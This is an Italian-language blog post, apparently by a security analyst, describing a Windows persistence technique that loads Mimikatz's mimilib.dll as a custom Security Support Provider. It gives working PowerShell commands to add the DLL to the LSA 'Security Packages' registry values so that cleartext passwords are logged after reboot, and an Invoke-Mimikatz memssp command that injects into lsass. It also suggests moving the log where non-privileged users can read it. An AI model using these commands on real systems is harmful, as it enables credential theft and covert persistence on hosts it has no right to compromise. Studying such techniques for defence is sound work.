Andrea Bruschi, Cyber Security Analyst

Persistence, custom SSP

Published by Andy

SSP

Security Support Provider è un aDLL che da la possibilità ad un'applicazione di ottenere una connessione autenticata. Alcuni pacchetti SSP di Microsoft sono i seguenti:

  • NTLM
  • Kerberos
  • Wdigest
  • CredSSP

Mimikatz ha una sula DLL SSP chiamata mimilib.dll. Questa SSP logga i logon locali, i service accounts e le password in chiaro sul server target. Ci sono un paio di modi per utilizzare questa dl. Il primo consiste nel salvare mimilib.dll dentro System32 e aggiungerla al registro HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Secutity Packages:

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

A questo punto fare il reboot della macchina e, nel file di log locale (C:\Windows\System32\kiwissp.log), saranno visibile le credenziali in chiaro.

Oppure, usando mimikaz, iniettare dentro Isass (Non stabile con Server 2016, a volte funziona, a volte no). Non richiede il reboot.

Invoke-Mimikatz -Command '"misc:memssp"'

E' possibile modificare la DLL per salvare il file di log in una posizione accessibile anche ad utenti con privilegi non elevati.

This article is my 9th oldest. It is 183 words long